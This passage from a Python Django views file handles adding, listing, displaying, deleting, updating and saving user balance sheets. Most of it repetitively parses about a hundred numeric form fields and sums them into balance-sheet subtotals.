'v48':sheet.a48, \\\n 'v49':sheet.a49, 'v50':sheet.a50, \\\n 'v55':sheet.a55, 'v56':sheet.a56, 'v57':sheet.a57, \\\n 'v58':sheet.a58, 'v59':sheet.a59, 'v60':sheet.a60, \\\n 'v61':sheet.a61, 'v62':sheet.a62, 'v63':sheet.a63, \\\n 'v64':sheet.a64, 'v65':sheet.a65, 'v66':sheet.a66, \\\n 'v67':sheet.a67, 'v68':sheet.a68, 'v69':sheet.a69, \\\n 'v70':sheet.a70, 'v71':sheet.a71, 'v72':sheet.a72, \\\n 'v73':sheet.a73, 'v74':sheet.a74, 'v75':sheet.a75, \\\n 'v76':sheet.a76, 'v77':sheet.a77, 'v78':sheet.a78, \\\n 'v79':sheet.a79, 'v80':sheet.a80, 'v81':sheet.a81, \\\n 'v82':sheet.a82, 'v83':sheet.a83, 'v84':sheet.a84, \\\n 'v85':sheet.a85, 'v86':sheet.a86, 'v87':sheet.a87, \\\n 'v88':sheet.a88, 'v89':sheet.a89, 'v90':sheet.a90, \\\n 'v91':sheet.a91, 'v92':sheet.a92, 'v93':sheet.a93, \\\n 'v94':sheet.a94, 'v95':sheet.a95, 'v96':sheet.a96, \\\n 'v97':sheet.a97, 'v98':sheet.a98, 'v99':sheet.a99, \\\n 'v100':sheet.a100, 'v101':sheet.a101, 'v102':sheet.a102, \\\n 'v103':sheet.a103, 'v104':sheet.a104, 'v105':sheet.a105, \\\n 'v106':sheet.a106, 'v107':sheet.a107, 'v108':sheet.a108, \\\n 'v109':sheet.a109, 'v110':sheet.a110, 'v111':sheet.a111, \\\n 'v112':sheet.a112, 'v113':sheet.a113, 'v114':sheet.a114, \\\n 'v115':sheet.a115, 'v116':sheet.a116, 'v117':sheet.a117, \\\n 'v118':sheet.a118\n })\n\ndef addbalancesheet(request, userid):\n username = usertable.objects.get(userid=userid).username\n return render(request, \"AddBalanceSheet.html\", {\"userid\":userid, \\\n \"username\":username, \"isupdate\":0})\n\ndef listbalancesheet(request, userid, flag):\n username = usertable.objects.get(userid=userid).username\n flag = int(flag)\n if(flag == 1):\n results = balancesheet.objects.filter(user=userid).order_by(\"-date\")\n if(flag == 2):\n results = balancesheet.objects.filter(user=userid).order_by(\"date\")\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1 })\n\ndef displaybalancesheet(request, userid, sheetid):\n username = usertable.objects.get(userid=userid).username\n sheet = balancesheet.objects.get(id=sheetid)\n return render(request, \"DisplayBalanceSheet.html\", {\"username\":username, \\\n \"userid\":userid, \"sheet\":sheet})\n\ndef deletebalancesheet(request, userid, sheetid):\n p = balancesheet.objects.get(id=sheetid)\n p.delete()\n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, \"isdelete\":1 })\n\ndef updatebalancesheet(request):\n userid = request.POST.get(\"userid\", '')\n sheetid = request.POST.get(\"sheetid\", '')\n \n unit = request.POST.get('unit', '')\n if unit == '':\n unit = ''\n a5 = request.POST.get('a5', '')\n if a5 == '':\n a5 = 0\n else:\n a5 = float(a5)\n a6 = request.POST.get('a6', '')\n if a6 == '':\n a6 = 0\n else:\n a6 = float(a6)\n a7 = request.POST.get('a7', '')\n if a7 == '':\n a7 = 0\n else:\n a7 = float(a7)\n a8 = request.POST.get('a8', '')\n if a8 == '':\n a8 = 0\n else:\n a8 = float(a8)\n a9 = request.POST.get('a9', '')\n if a9 == '':\n a9 = 0\n else:\n a9 = float(a9)\n a10 = request.POST.get('a10', '')\n if a10 == '':\n a10 = 0\n else:\n a10 = float(a10)\n a11 = request.POST.get('a11', '')\n if a11 == '':\n a11 = 0\n else:\n a11 = float(a11)\n a12 = request.POST.get('a12', '')\n if a12 == '':\n a12 = 0\n else:\n a12 = float(a12)\n a13 = request.POST.get('a13', '')\n if a13 == '':\n a13 = 0\n 
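# --- Illustrative sketch, not part of the original: every a<n> field parsed in
# updatebalancesheet and savebalancesheet repeats the same "empty POST value -> 0,
# otherwise float()" block. A helper collapses the hundreds of parsing lines to a
# loop over the field indices this form actually uses (a5..a50 and a55..a118):
def get_float(request, name):
    raw = request.POST.get(name, '')
    return float(raw) if raw != '' else 0

def parse_sheet_fields(request):
    indices = list(range(5, 51)) + list(range(55, 119))
    return dict(('a%d' % i, get_float(request, 'a%d' % i)) for i in indices)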
else:\n a13 = float(a13)\n a14 = request.POST.get('a14', '')\n if a14 == '':\n a14 = 0\n else:\n a14 = float(a14)\n a15 = request.POST.get('a15', '')\n if a15 == '':\n a15 = 0\n else:\n a15 = float(a15)\n a16 = request.POST.get('a16', '')\n if a16 == '':\n a16 = 0\n else:\n a16 = float(a16)\n a17 = request.POST.get('a17', '')\n if a17 == '':\n a17 = 0\n else:\n a17 = float(a17)\n a18 = request.POST.get('a18', '')\n if a18 == '':\n a18 = 0\n else:\n a18 = float(a18)\n a19 = request.POST.get('a19', '')\n if a19 == '':\n a19 = 0\n else:\n a19 = float(a19)\n a20 = request.POST.get('a20', '')\n if a20 == '':\n a20 = 0\n else:\n a20 = float(a20)\n a21 = request.POST.get('a21', '')\n if a21 == '':\n a21 = 0\n else:\n a21 = float(a21)\n a22 = request.POST.get('a22', '')\n if a22 == '':\n a22 = 0\n else:\n a22 = float(a22)\n a23 = request.POST.get('a23', '')\n if a23 == '':\n a23 = 0\n else:\n a23 = float(a23)\n a24 = request.POST.get('a24', '')\n if a24 == '':\n a24 = 0\n else:\n a24 = float(a24)\n a25 = request.POST.get('a25', '')\n if a25 == '':\n a25 = 0\n else:\n a25 = float(a25)\n a26 = request.POST.get('a26', '')\n if a26 == '':\n a26 = 0\n else:\n a26 = float(a26)\n a27 = request.POST.get('a27', '')\n if a27 == '':\n a27 = 0\n else:\n a27 = float(a27)\n a28 = request.POST.get('a28', '')\n if a28 == '':\n a28 = 0\n else:\n a28 = float(a28)\n a29 = request.POST.get('a29', '')\n if a29 == '':\n a29 = 0\n else:\n a29 = float(a29)\n a30 = request.POST.get('a30', '')\n if a30 == '':\n a30 = 0\n else:\n a30 = float(a30)\n a31 = request.POST.get('a31', '')\n if a31 == '':\n a31 = 0\n else:\n a31 = float(a31)\n a32 = request.POST.get('a32', '')\n if a32 == '':\n a32 = 0\n else:\n a32 = float(a32)\n a33 = request.POST.get('a33', '')\n if a33 == '':\n a33 = 0\n else:\n a33 = float(a33)\n a34 = request.POST.get('a34', '')\n if a34 == '':\n a34 = 0\n else:\n a34 = float(a34)\n a35 = request.POST.get('a35', '')\n if a35 == '':\n a35 = 0\n else:\n a35 = float(a35)\n a36 = request.POST.get('a36', '')\n if a36 == '':\n a36 = 0\n else:\n a36 = float(a36)\n a37 = request.POST.get('a37', '')\n if a37 == '':\n a37 = 0\n else:\n a37 = float(a37)\n a38 = request.POST.get('a38', '')\n if a38 == '':\n a38 = 0\n else:\n a38 = float(a38)\n a39 = request.POST.get('a39', '')\n if a39 == '':\n a39 = 0\n else:\n a39 = float(a39)\n a40 = request.POST.get('a40', '')\n if a40 == '':\n a40 = 0\n else:\n a40 = float(a40)\n a41 = request.POST.get('a41', '')\n if a41 == '':\n a41 = 0\n else:\n a41 = float(a41)\n a42 = request.POST.get('a42', '')\n if a42 == '':\n a42 = 0\n else:\n a42 = float(a42)\n a43 = request.POST.get('a43', '')\n if a43 == '':\n a43 = 0\n else:\n a43 = float(a43)\n a44 = request.POST.get('a44', '')\n if a44 == '':\n a44 = 0\n else:\n a44 = float(a44)\n a45 = request.POST.get('a45', '')\n if a45 == '':\n a45 = 0\n else:\n a45 = float(a45)\n a46 = request.POST.get('a46', '')\n if a46 == '':\n a46 = 0\n else:\n a46 = float(a46)\n a47 = request.POST.get('a47', '')\n if a47 == '':\n a47 = 0\n else:\n a47 = float(a47)\n a48 = request.POST.get('a48', '')\n if a48 == '':\n a48 = 0\n else:\n a48 = float(a48)\n a49 = request.POST.get('a49', '')\n if a49 == '':\n a49 = 0\n else:\n a49 = float(a49)\n a50 = request.POST.get('a50', '')\n if a50 == '':\n a50 = 0\n else:\n a50 = float(a50)\n\n a55 = request.POST.get('a55', '')\n if a55 == '':\n a55 = 0\n else:\n a55 = float(a55)\n a56 = request.POST.get('a56', '')\n if a56 == '':\n a56 = 0\n else:\n a56 = float(a56)\n a57 = request.POST.get('a57', '')\n if a57 == '':\n 
a57 = 0\n else:\n a57 = float(a57)\n a58 = request.POST.get('a58', '')\n if a58 == '':\n a58 = 0\n else:\n a58 = float(a58)\n a59 = request.POST.get('a59', '')\n if a59 == '':\n a59 = 0\n else:\n a59 = float(a59)\n a60 = request.POST.get('a60', '')\n if a60 == '':\n a60 = 0\n else:\n a60 = float(a60)\n a61 = request.POST.get('a61', '')\n if a61 == '':\n a61 = 0\n else:\n a61 = float(a61)\n a62 = request.POST.get('a62', '')\n if a62 == '':\n a62 = 0\n else:\n a62 = float(a62)\n a63 = request.POST.get('a63', '')\n if a63 == '':\n a63 = 0\n else:\n a63 = float(a63)\n a64 = request.POST.get('a64', '')\n if a64 == '':\n a64 = 0\n else:\n a64 = float(a64)\n a65 = request.POST.get('a65', '')\n if a65 == '':\n a65 = 0\n else:\n a65 = float(a65)\n a66 = request.POST.get('a66', '')\n if a66 == '':\n a66 = 0\n else:\n a66 = float(a66)\n a67 = request.POST.get('a67', '')\n if a67 == '':\n a67 = 0\n else:\n a67 = float(a67)\n a68 = request.POST.get('a68', '')\n if a68 == '':\n a68 = 0\n else:\n a68 = float(a68)\n a69 = request.POST.get('a69', '')\n if a69 == '':\n a69 = 0\n else:\n a69 = float(a69)\n a70 = request.POST.get('a70', '')\n if a70 == '':\n a70 = 0\n else:\n a70 = float(a70)\n a71 = request.POST.get('a71', '')\n if a71 == '':\n a71 = 0\n else:\n a71 = float(a71)\n a72 = request.POST.get('a72', '')\n if a72 == '':\n a72 = 0\n else:\n a72 = float(a72)\n a73 = request.POST.get('a73', '')\n if a73 == '':\n a73 = 0\n else:\n a73 = float(a73)\n a74 = request.POST.get('a74', '')\n if a74 == '':\n a74 = 0\n else:\n a74 = float(a74)\n a75 = request.POST.get('a75', '')\n if a75 == '':\n a75 = 0\n else:\n a75 = float(a75)\n a76 = request.POST.get('a76', '')\n if a76 == '':\n a76 = 0\n else:\n a76 = float(a76)\n a77 = request.POST.get('a77', '')\n if a77 == '':\n a77 = 0\n else:\n a77 = float(a77)\n a78 = request.POST.get('a78', '')\n if a78 == '':\n a78 = 0\n else:\n a78 = float(a78)\n a79 = request.POST.get('a79', '')\n if a79 == '':\n a79 = 0\n else:\n a79 = float(a79)\n a80 = request.POST.get('a80', '')\n if a80 == '':\n a80 = 0\n else:\n a80 = float(a80)\n a81 = request.POST.get('a81', '')\n if a81 == '':\n a81 = 0\n else:\n a81 = float(a81)\n a82 = request.POST.get('a82', '')\n if a82 == '':\n a82 = 0\n else:\n a82 = float(a82)\n a83 = request.POST.get('a83', '')\n if a83 == '':\n a83 = 0\n else:\n a83 = float(a83)\n a84 = request.POST.get('a84', '')\n if a84 == '':\n a84 = 0\n else:\n a84 = float(a84)\n a85 = request.POST.get('a85', '')\n if a85 == '':\n a85 = 0\n else:\n a85 = float(a85)\n a86 = request.POST.get('a86', '')\n if a86 == '':\n a86 = 0\n else:\n a86 = float(a86)\n a87 = request.POST.get('a87', '')\n if a87 == '':\n a87 = 0\n else:\n a87 = float(a87)\n a88 = request.POST.get('a88', '')\n if a88 == '':\n a88 = 0\n else:\n a88 = float(a88)\n a89 = request.POST.get('a89', '')\n if a89 == '':\n a89 = 0\n else:\n a89 = float(a89)\n a90 = request.POST.get('a90', '')\n if a90 == '':\n a90 = 0\n else:\n a90 = float(a90)\n a91 = request.POST.get('a91', '')\n if a91 == '':\n a91 = 0\n else:\n a91 = float(a91)\n a92 = request.POST.get('a92', '')\n if a92 == '':\n a92 = 0\n else:\n a92 = float(a92)\n a93 = request.POST.get('a93', '')\n if a93 == '':\n a93 = 0\n else:\n a93 = float(a93)\n a94 = request.POST.get('a94', '')\n if a94 == '':\n a94 = 0\n else:\n a94 = float(a94)\n a95 = request.POST.get('a95', '')\n if a95 == '':\n a95 = 0\n else:\n a95 = float(a95)\n a96 = request.POST.get('a96', '')\n if a96 == '':\n a96 = 0\n else:\n a96 = float(a96)\n a97 = request.POST.get('a97', '')\n if a97 == 
'':\n a97 = 0\n else:\n a97 = float(a97)\n a98 = request.POST.get('a98', '')\n if a98 == '':\n a98 = 0\n else:\n a98 = float(a98)\n a99 = request.POST.get('a99', '')\n if a99 == '':\n a99 = 0\n else:\n a99 = float(a99)\n a100 = request.POST.get('a100', '')\n if a100 == '':\n a100 = 0\n else:\n a100 = float(a100)\n a101 = request.POST.get('a101', '')\n if a101 == '':\n a101 = 0\n else:\n a101 = float(a101)\n a102 = request.POST.get('a102', '')\n if a102 == '':\n a102 = 0\n else:\n a102 = float(a102)\n a103 = request.POST.get('a103', '')\n if a103 == '':\n a103 = 0\n else:\n a103 = float(a103)\n a104 = request.POST.get('a104', '')\n if a104 == '':\n a104 = 0\n else:\n a104 = float(a104)\n a105 = request.POST.get('a105', '')\n if a105 == '':\n a105 = 0\n else:\n a105 = float(a105)\n a106 = request.POST.get('a106', '')\n if a106 == '':\n a106 = 0\n else:\n a106 = float(a106)\n a107 = request.POST.get('a107', '')\n if a107 == '':\n a107 = 0\n else:\n a107 = float(a107)\n a108 = request.POST.get('a108', '')\n if a108 == '':\n a108 = 0\n else:\n a108 = float(a108)\n a109 = request.POST.get('a109', '')\n if a109 == '':\n a109 = 0\n else:\n a109 = float(a109)\n a110 = request.POST.get('a110', '')\n if a110 == '':\n a110 = 0\n else:\n a110 = float(a110)\n a111 = request.POST.get('a111', '')\n if a111 == '':\n a111 = 0\n else:\n a111 = float(a111)\n a112 = request.POST.get('a112', '')\n if a112 == '':\n a112 = 0\n else:\n a112 = float(a112)\n a113 = request.POST.get('a113', '')\n if a113 == '':\n a113 = 0\n else:\n a113 = float(a113)\n a114 = request.POST.get('a114', '')\n if a114 == '':\n a114 = 0\n else:\n a114 = float(a114)\n a115 = request.POST.get('a115', '')\n if a115 == '':\n a115 = 0\n else:\n a115 = float(a115)\n a116 = request.POST.get('a116', '')\n if a116 == '':\n a116 = 0\n else:\n a116 = float(a116)\n a117 = request.POST.get('a117', '')\n if a117 == '':\n a117 = 0\n else:\n a117 = float(a117)\n a118 = request.POST.get('a118', '')\n if a118 == '':\n a118 = 0\n else:\n a118 = float(a118)\n \n SUMB1 = a5+a9+a13+a17+a21+a25+a29+a33+a37+a41+a45\n SUMC1 = a6+a10+a14+a18+a22+a26+a30+a34+a38+a42+a46\n SUME1 = a7+a11+a15+a19+a23+a27+a31+a35+a39+a43+a47+a49\n SUMF1 = a8+a12+a16+a20+a24+a28+a32+a36+a40+a44+a48+a50\n SUBB1 = a75-a79\n SUBC1 = a76-a80\n SUME2 = a57+a61+a65+a69+a73+a77+a81\n SUMF2 = a58+a62+a66+a70+a74+a78+a82\n SUME3 = SUME1+SUME2\n SUMF3 = SUMF1+SUMF2\n SUBB2 = SUBB1 - a83\n SUBC2 = SUBC1 - a84\n SUME4 = a91+a95+a99+a103+a107+a111\n SUMF4 = a92+a96+a100+a104+a108+a112\n SUMB2 = a63+a67+a71+SUBB2+a85+a89+a93+a97+a101+a105+a109+a113+a115+a117\n SUMC2 = a64+a68+a72+SUBC2+a86+a90+a94+a98+a102+a106+a110+a114+a116+a118\n SUMB3 = SUMB1+SUMB2\n SUMC3 = SUMC1+SUMC2\n SUME5 = SUME3+SUME4\n SUMF5 = SUMF3+SUMF4\n now = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n \n updatesheet = balancesheet.objects.get(id=sheetid)\n updatesheet.date = now\n updatesheet.unit = unit\n updatesheet.SUMB1 = SUMB1\n updatesheet.SUMC1 = SUMC1\n updatesheet.SUME1 = SUME1\n updatesheet.SUMF1 = SUMF1\n updatesheet.SUBB1 = SUBB1\n updatesheet.SUBC1 = SUBC1\n updatesheet.SUME2 = SUME2\n updatesheet.SUMF2 = SUMF2\n updatesheet.SUME3 = SUME3\n updatesheet.SUMF3 = SUMF3\n updatesheet.SUBB2 = SUBB2\n updatesheet.SUBC2 = SUBC2\n updatesheet.SUME4 = SUME4\n updatesheet.SUMF4 = SUMF4\n updatesheet.SUMB2 = SUMB2\n updatesheet.SUMC2 = SUMC2\n updatesheet.SUMB3 = SUMB3\n updatesheet.SUMC3 = SUMC3\n updatesheet.SUME5 = SUME5\n updatesheet.SUMF5 = SUMF5\n updatesheet.unit = unit\n updatesheet.date = now\n 
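# --- Illustrative sketch, not part of the original: with the values in a dict (see
# the parse_sheet_fields sketch earlier), the fixed-position subtotal formulas above
# become data-driven instead of hand-typed sums:
def col_sum(values, indices):
    return sum(values['a%d' % i] for i in indices)

# e.g. SUMB1 = col_sum(values, [5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45])
#      SUMC1 = col_sum(values, [6, 10, 14, 18, 22, 26, 30, 34, 38, 42, 46])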
updatesheet.a5 = a5\n updatesheet.a6 = a6\n updatesheet.a7 = a7\n updatesheet.a8 = a8\n updatesheet.a9 = a9\n updatesheet.a10 = a10\n updatesheet.a11 = a11\n updatesheet.a12 = a12\n updatesheet.a13 = a13\n updatesheet.a14 = a14\n updatesheet.a15 = a15\n updatesheet.a16 = a16\n updatesheet.a17 = a17\n updatesheet.a18 = a18\n updatesheet.a19 = a19\n updatesheet.a20 = a20\n updatesheet.a21 = a21\n updatesheet.a22 = a22\n updatesheet.a23 = a23\n updatesheet.a24 = a24\n updatesheet.a25 = a25\n updatesheet.a26 = a26\n updatesheet.a27 = a27\n updatesheet.a28 = a28\n updatesheet.a29 = a29\n updatesheet.a30 = a30\n updatesheet.a31 = a31\n updatesheet.a32 = a32\n updatesheet.a33 = a33\n updatesheet.a34 = a34\n updatesheet.a35 = a35\n updatesheet.a36 = a36\n updatesheet.a37 = a37\n updatesheet.a38 = a38\n updatesheet.a39 = a39\n updatesheet.a40 = a40\n updatesheet.a41 = a41\n updatesheet.a42 = a42\n updatesheet.a43 = a43\n updatesheet.a44 = a44\n updatesheet.a45 = a45\n updatesheet.a46 = a46\n updatesheet.a47 = a47\n updatesheet.a48 = a48\n updatesheet.a49 = a49\n updatesheet.a50 = a50\n updatesheet.a55 = a55\n updatesheet.a56 = a56\n updatesheet.a57 = a57\n updatesheet.a58 = a58\n updatesheet.a59 = a59\n updatesheet.a60 = a60\n updatesheet.a61 = a61\n updatesheet.a62 = a62\n updatesheet.a63 = a63\n updatesheet.a64 = a64\n updatesheet.a65 = a65\n updatesheet.a66 = a66\n updatesheet.a67 = a67\n updatesheet.a68 = a68\n updatesheet.a69 = a69\n updatesheet.a70 = a70\n updatesheet.a71 = a71\n updatesheet.a72 = a72\n updatesheet.a73 = a73\n updatesheet.a74 = a74\n updatesheet.a75 = a75\n updatesheet.a76 = a76\n updatesheet.a77 = a77\n updatesheet.a78 = a78\n updatesheet.a79 = a79\n updatesheet.a80 = a80\n updatesheet.a81 = a81\n updatesheet.a82 = a82\n updatesheet.a83 = a83\n updatesheet.a84 = a84\n updatesheet.a85 = a85\n updatesheet.a86 = a86\n updatesheet.a87 = a87\n updatesheet.a88 = a88\n updatesheet.a89 = a89\n updatesheet.a90 = a90\n updatesheet.a91 = a91\n updatesheet.a92 = a92\n updatesheet.a93 = a93\n updatesheet.a94 = a94\n updatesheet.a95 = a95\n updatesheet.a96 = a96\n updatesheet.a97 = a97\n updatesheet.a98 = a98\n updatesheet.a99 = a99\n updatesheet.a100 = a100\n updatesheet.a101 = a101\n updatesheet.a102 = a102\n updatesheet.a103 = a103\n updatesheet.a104 = a104\n updatesheet.a105 = a105\n updatesheet.a106 = a106\n updatesheet.a107 = a107\n updatesheet.a108 = a108\n updatesheet.a109 = a109\n updatesheet.a110 = a110\n updatesheet.a111 = a111\n updatesheet.a112 = a112\n updatesheet.a113 = a113\n updatesheet.a114 = a114\n updatesheet.a115 = a115\n updatesheet.a116 = a116\n updatesheet.a117 = a117\n updatesheet.a118 = a118\n updatesheet.save()\n \n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, 'isupdate':1 })\n\ndef savebalancesheet(request):\n userid = request.POST.get(\"userid\", '')\n \n unit = request.POST.get('unit', '')\n if unit == '':\n unit = ''\n\n a5 = request.POST.get('a5', '')\n if a5 == '':\n a5 = 0\n else:\n a5 = float(a5)\n a6 = request.POST.get('a6', '')\n if a6 == '':\n a6 = 0\n else:\n a6 = float(a6)\n a7 = request.POST.get('a7', '')\n if a7 == '':\n a7 = 0\n else:\n a7 = float(a7)\n a8 = request.POST.get('a8', '')\n if a8 == '':\n a8 = 0\n else:\n a8 = float(a8)\n a9 = request.POST.get('a9', '')\n if a9 == '':\n a9 = 0\n else:\n a9 = float(a9)\n a10 = request.POST.get('a10', 
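# --- Illustrative note, not part of the original: the field-by-field copy onto
# updatesheet above is identical for every a<n>; with the dict returned by the
# parse_sheet_fields sketch it collapses to a setattr loop:
#   for name, value in parse_sheet_fields(request).items():
#       setattr(updatesheet, name, value)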
'')\n if a10 == '':\n a10 = 0\n else:\n a10 = float(a10)\n a11 = request.POST.get('a11', '')\n if a11 == '':\n a11 = 0\n else:\n a11 = float(a11)\n a12 = request.POST.get('a12', '')\n if a12 == '':\n a12 = 0\n else:\n a12 = float(a12)\n a13 = request.POST.get('a13', '')\n if a13 == '':\n a13 = 0\n else:\n a13 = float(a13)\n a14 = request.POST.get('a14', '')\n if a14 == '':\n a14 = 0\n else:\n a14 = float(a14)\n a15 = request.POST.get('a15', '')\n if a15 == '':\n a15 = 0\n else:\n a15 = float(a15)\n a16 = request.POST.get('a16', '')\n if a16 == '':\n a16 = 0\n else:\n a16 = float(a16)\n a17 = request.POST.get('a17', '')\n if a17 == '':\n a17 = 0\n else:\n a17 = float(a17)\n a18 = request.POST.get('a18', '')\n if a18 == '':\n a18 = 0\n else:\n a18 = float(a18)\n a19 = request.POST.get('a19', '')\n if a19 == '':\n a19 = 0\n else:\n a19 = float(a19)\n a20 = request.POST.get('a20', '')\n if a20 == '':\n a20 = 0\n else:\n a20 = float(a20)\n a21 = request.POST.get('a21', '')\n if a21 == '':\n a21 = 0\n else:\n a21 = float(a21)\n a22 = request.POST.get('a22', '')\n if a22 == '':\n a22 = 0\n else:\n a22 = float(a22)\n a23 = request.POST.get('a23', '')\n if a23 == '':\n a23 = 0\n else:\n a23 = float(a23)\n a24 = request.POST.get('a24', '')\n if a24 == '':\n a24 = 0\n else:\n a24 = float(a24)\n a25 = request.POST.get('a25', '')\n if a25 == '':\n a25 = 0\n else:\n a25 = float(a25)\n a26 = request.POST.get('a26', '')\n if a26 == '':\n a26 = 0\n else:\n a26 = float(a26)\n a27 = request.POST.get('a27', '')\n if a27 == '':\n a27 = 0\n else:\n a27 = float(a27)\n a28 = request.POST.get('a28', '')\n if a28 == '':\n a28 = 0\n else:\n a28 = float(a28)\n a29 = request.POST.get('a29', '')\n if a29 == '':\n a29 = 0\n else:\n a29 = float(a29)\n a30 = request.POST.get('a30', '')\n if a30 == '':\n a30 = 0\n else:\n a30 = float(a30)\n a31 = request.POST.get('a31', '')\n if a31 == '':\n a31 = 0\n else:\n a31 = float(a31)\n a32 = request.POST.get('a32', '')\n if a32 == '':\n a32 = 0\n else:\n a32 = float(a32)\n a33 = request.POST.get('a33', '')\n if a33 == '':\n a33 = 0\n else:\n a33 = float(a33)\n a34 = request.POST.get('a34', '')\n if a34 == '':\n a34 = 0\n else:\n a34 = float(a34)\n a35 = request.POST.get('a35', '')\n if a35 == '':\n a35 = 0\n else:\n a35 = float(a35)\n a36 = request.POST.get('a36', '')\n if a36 == '':\n a36 = 0\n else:\n a36 = float(a36)\n a37 = request.POST.get('a37', '')\n if a37 == '':\n a37 = 0\n else:\n a37 = float(a37)\n a38 = request.POST.get('a38', '')\n if a38 == '':\n a38 = 0\n else:\n a38 = float(a38)\n a39 = request.POST.get('a39', '')\n if a39 == '':\n a39 = 0\n else:\n a39 = float(a39)\n a40 = request.POST.get('a40', '')\n if a40 == '':\n a40 = 0\n else:\n a40 = float(a40)\n a41 = request.POST.get('a41', '')\n if a41 == '':\n a41 = 0\n else:\n a41 = float(a41)\n a42 = request.POST.get('a42', '')\n if a42 == '':\n a42 = 0\n else:\n a42 = float(a42)\n a43 = request.POST.get('a43', '')\n if a43 == '':\n a43 = 0\n else:\n a43 = float(a43)\n a44 = request.POST.get('a44', '')\n if a44 == '':\n a44 = 0\n else:\n a44 = float(a44)\n a45 = request.POST.get('a45', '')\n if a45 == '':\n a45 = 0\n else:\n a45 = float(a45)\n a46 = request.POST.get('a46', '')\n if a46 == '':\n a46 = 0\n else:\n a46 = float(a46)\n a47 = request.POST.get('a47', '')\n if a47 == '':\n a47 = 0\n else:\n a47 = float(a47)\n a48 = request.POST.get('a48', '')\n if a48 == '':\n a48 = 0\n else:\n a48 = float(a48)\n a49 = request.POST.get('a49', '')\n if a49 == '':\n a49 = 0\n else:\n a49 = float(a49)\n a50 = 
request.POST.get('a50', '')\n if a50 == '':\n a50 = 0\n else:\n a50 = float(a50)\n a55 = request.POST.get('a55', '')\n if a55 == '':\n a55 = 0\n else:\n a55 = float(a55)\n a56 = request.POST.get('a56', '')\n if a56 == '':\n a56 = 0\n else:\n a56 = float(a56)\n a57 = request.POST.get('a57', '')\n if a57 == '':\n a57 = 0\n else:\n a57 = float(a57)\n a58 = request.POST.get('a58', '')\n if a58 == '':\n a58 = 0\n else:\n a58 = float(a58)\n a59 = request.POST.get('a59', '')\n if a59 == '':\n a59 = 0\n else:\n a59 = float(a59)\n a60 = request.POST.get('a60', '')\n if a60 == '':\n a60 = 0\n else:\n a60 = float(a60)\n a61 = request.POST.get('a61', '')\n if a61 == '':\n a61 = 0\n else:\n a61 = float(a61)\n a62 = request.POST.get('a62', '')\n if a62 == '':\n a62 = 0\n else:\n a62 = float(a62)\n a63 = request.POST.get('a63', '')\n if a63 == '':\n a63 = 0\n else:\n a63 = float(a63)\n a64 = request.POST.get('a64', '')\n if a64 == '':\n a64 = 0\n else:\n a64 = float(a64)\n a65 = request.POST.get('a65', '')\n if a65 == '':\n a65 = 0\n else:\n a65 = float(a65)\n a66 = request.POST.get('a66', '')\n if a66 == '':\n a66 = 0\n else:\n a66 = float(a66)\n a67 = request.POST.get('a67', '')\n if a67 == '':\n a67 = 0\n else:\n a67 = float(a67)\n a68 = request.POST.get('a68', '')\n if a68 == '':\n a68 = 0\n else:\n a68 = float(a68)\n a69 = request.POST.get('a69', '')\n if a69 == '':\n a69 = 0\n else:\n a69 = float(a69)\n a70 = request.POST.get('a70', '')\n if a70 == '':\n a70 = 0\n else:\n a70 = float(a70)\n a71 = request.POST.get('a71', '')\n if a71 == '':\n a71 = 0\n else:\n a71 = float(a71)\n a72 = request.POST.get('a72', '')\n if a72 == '':\n a72 = 0\n else:\n a72 = float(a72)\n a73 = request.POST.get('a73', '')\n if a73 == '':\n a73 = 0\n else:\n a73 = float(a73)\n a74 = request.POST.get('a74', '')\n if a74 == '':\n a74 = 0\n else:\n a74 = float(a74)\n a75 = request.POST.get('a75', '')\n if a75 == '':\n a75 = 0\n else:\n a75 = float(a75)\n a76 = request.POST.get('a76', '')\n if a76 == '':\n a76 = 0\n else:\n a76 = float(a76)\n a77 = request.POST.get('a77', '')\n if a77 == '':\n a77 = 0\n else:\n a77 = float(a77)\n a78 = request.POST.get('a78', '')\n if a78 == '':\n a78 = 0\n else:\n a78 = float(a78)\n a79 = request.POST.get('a79', '')\n if a79 == '':\n a79 = 0\n else:\n a79 = float(a79)\n a80 = request.POST.get('a80', '')\n if a80 == '':\n a80 = 0\n else:\n a80 = float(a80)\n a81 = request.POST.get('a81', '')\n if a81 == '':\n a81 = 0\n else:\n a81 = float(a81)\n a82 = request.POST.get('a82', '')\n if a82 == '':\n a82 = 0\n else:\n a82 = float(a82)\n a83 = request.POST.get('a83', '')\n if a83 == '':\n a83 = 0\n else:\n a83 = float(a83)\n a84 = request.POST.get('a84', '')\n if a84 == '':\n a84 = 0\n else:\n a84 = float(a84)\n a85 = request.POST.get('a85', '')\n if a85 == '':\n a85 = 0\n else:\n a85 = float(a85)\n a86 = request.POST.get('a86', '')\n if a86 == '':\n a86 = 0\n else:\n a86 = float(a86)\n a87 = request.POST.get('a87', '')\n if a87 == '':\n a87 = 0\n else:\n a87 = float(a87)\n a88 = request.POST.get('a88', '')\n if a88 == '':\n a88 = 0\n else:\n a88 = float(a88)\n a89 = request.POST.get('a89', '')\n if a89 == '':\n a89 = 0\n else:\n a89 = float(a89)\n a90 = request.POST.get('a90', '')\n if a90 == '':\n a90 = 0\n else:\n a90 = float(a90)\n a91 = request.POST.get('a91', '')\n if a91 == '':\n a91 = 0\n else:\n a91 = float(a91)\n a92 = request.POST.get('a92', '')\n if a92 == '':\n a92 = 0\n else:\n a92 = float(a92)\n a93 = request.POST.get('a93', '')\n if a93 == '':\n a93 = 0\n else:\n a93 = float(a93)\n 
